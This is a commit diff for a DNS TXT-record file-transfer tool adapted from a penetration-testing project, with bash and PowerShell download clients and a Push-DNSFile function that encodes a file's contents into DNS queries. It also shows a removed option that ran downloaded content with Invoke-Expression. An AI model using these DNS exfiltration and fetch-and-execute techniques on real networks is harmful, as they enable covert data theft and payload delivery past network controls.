1
0
Fork 0

Minimal working examples added, README and LICENSE adjusted

master
Simon Moser vor 3 Jahren
Ursprung 7fbb57fdde
Commit 81c6d8bc21
Es konnte kein GPG-Schlüssel zu dieser Signatur gefunden werden
GPG-Schlüssel-ID: 83765B895FF2CFC6

@ -1,6 +1,6 @@
MIT License MIT License
Copyright (c) 2016 Pen Test Partners Copyright (c) 2022 Simon Moser
Permission is hereby granted, free of charge, to any person obtaining a copy Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal of this software and associated documentation files (the "Software"), to deal

@ -1,16 +1,17 @@
# Uninvited-Guest # DNS File-Transfer
Uninvited Guest - A file server for files over DNS TXT records A file server for files over DNS TXT records
## Requirements on server
- *Python3*
- *dnslib:* e.g. `pip3 install dnslib`
## Usage
First set up your domain to point to which ever server you're hosting this on. First set up your domain to point to which ever server you're hosting this on.
Then run the python server Then run the python server:
./server --domain domainname.com --directory /dir/of/tools `./server.py --domain domainname.com --directory /dir/of/tools`
It will only support a flat directory structure in /dir/of/tools It will only support a flat directory structure in /dir/of/tools
You will need to write your own client to receive files. The count of items will be in file.count.domainname.com and the strings will be in file.number.domainname.com. Strongly based on [Uninvited Guest by Pen Test Partners](https://github.com/pentestpartners/Uninvited-Guest)
An example bash client would be something like:
f="pwned.png";d="6-9.eu";c=$(dig +short txt $f.count.$d|tr -d \");for i in $(seq 0 $c);do echo -n $(dig +short txt $f.$i.$d|tr -d \");done | base64 -d > /tmp/pwned.png

@ -1,10 +1,8 @@
# Simple Powershell client, also runs on linux with Powershell Core # Simple Powershell client, also runs on linux with Powershell Core
Function Get-DnsTxt { Function Get-DnsTxt {
[CmdletBinding()] param( [CmdletBinding()] param([string] $Domain)
[string] $Domain
)
Try { Try {
return (Resolve-DnsName -Type TXT $Domain | Select-Object Strings | Format-Table -HideTableHeaders | Out-String -Width 1000).Replace("{", "").Replace("}", "").Trim() return (Resolve-DnsName -Type TXT $Domain).Strings
} Catch [System.Management.Automation.CommandNotFoundException] { } Catch [System.Management.Automation.CommandNotFoundException] {
return dig +short $Domain TXT return dig +short $Domain TXT
} }
@ -13,27 +11,14 @@ Function Get-DnsTxt {
Function Get-DnsFile { Function Get-DnsFile {
[CmdletBinding()] param( [CmdletBinding()] param(
[string] $FileName = $(Read-Host -Prompt 'Enter a FileName'), [string] $FileName = $(Read-Host -Prompt 'Enter a FileName'),
[string] $DnsName = $(Read-Host -Prompt 'Enter a DnsName'), [string] $DnsName = $(Read-Host -Prompt 'Enter a DnsName')
[switch] $Execute,
[switch] $Write,
[string] $OutPath
) )
$count = [int](Get-DnsTxt -Domain "$FileName.count.$DnsName") $count = [int](Get-DnsTxt -Domain "$FileName.count.$DnsName")
$file_base64 = "" $file_base64 = ""
For ($i=0; $i -le $count; $i++) { For ($i=0; $i -le $count; $i++) {
$file_base64 += (Get-DnsTxt -Domain "$FileName.$i.$DnsName") $file_base64 += (Get-DnsTxt -Domain "$FileName.$i.$DnsName")
} }
"Base64 $file_base64" [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($file_base64))
$file_string = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($file_base64))
"String $file_string"
If ($Execute.IsPresent) {
$file_string | Invoke-Expression
} Else {
$file_string | Out-String
}
If ($Write.IsPresent) {
$file_string | Out-File -FilePath ($OutPath, $FileName)[!$OutPath]
}
} }
Function Push-DNSFile { Function Push-DNSFile {
@ -41,22 +26,30 @@ Function Push-DNSFile {
[string] $FileName = $(Read-Host -Prompt 'Enter a Filename'), [string] $FileName = $(Read-Host -Prompt 'Enter a Filename'),
[string] $DnsName = $(Read-Host -Prompt 'Enter a DnsName') [string] $DnsName = $(Read-Host -Prompt 'Enter a DnsName')
) )
$id = (Get-FileHash $FileName | Select-Object Hash | Format-Table -HideTableHeaders | Out-String).Trim() $id = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes((Get-FileHash $FileName).Hash)).Substring(0,6)
$id = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($id)).Substring(0,6) $content = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes((Get-Content -Path $FileName)))
$content_binary = Get-Content -Path $FileName -Encoding utf8
$content_base64 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($content_binary))
$i = 0 $i = 0
While ($content_base64) { While ($true) {
$url = "."+$i+"-"+$id+"u."+$DnsName $url = ".$i-${id}u.$DnsName"
$len = 63 - $url.Length $len = 63 - $url.Length
if($len -le $content_base64.Length) { $i++
$content_part = $content_base64.Substring(0, $len) if($len -lt $content.Length) {
$content_base64 = $content_base64.Substring($len) Get-DnsTxt -Domain ($content.Substring(0, $len) + $url)
$content = $content.Substring($len)
} else { } else {
$content_part = $content_base64 Get-DnsTxt -Domain ($content + $url)
$content_base64 = $false break
} }
Get-DnsTxt -Domain ($content_part + $url)
$i++
} }
} }
# Minimal working example for download in case you have to type it all manually
Function MWE {
param([string] $f, [string] $d)
$c = [int]((Resolve-DnsName -Type TXT "$f.count.$d").Strings)
$o = ""
For ($i=0; $i -le $c; $i++) {
$o += (Resolve-DnsName -Type TXT "$f.$i.$d").Strings
}
[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($o))
}

@ -20,3 +20,9 @@ else
fi fi
done done
fi fi
# Minimal working example for download in case you have to type it all manually
mwe() {
f=$1; s=$2; c=$(dig +short txt "$f".count."$s"|tr -d \")
for i in $(seq 0 "$c"); do echo -n "$(dig +short txt "$f"."$i"."$s"|tr -d \")"; done | base64 -d > "$f"
}

@ -1,4 +1,4 @@
#!/usr/bin/env /usr/bin/python #!/usr/bin/env /usr/bin/python3
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
""" """

Laden…
Abbrechen
Speichern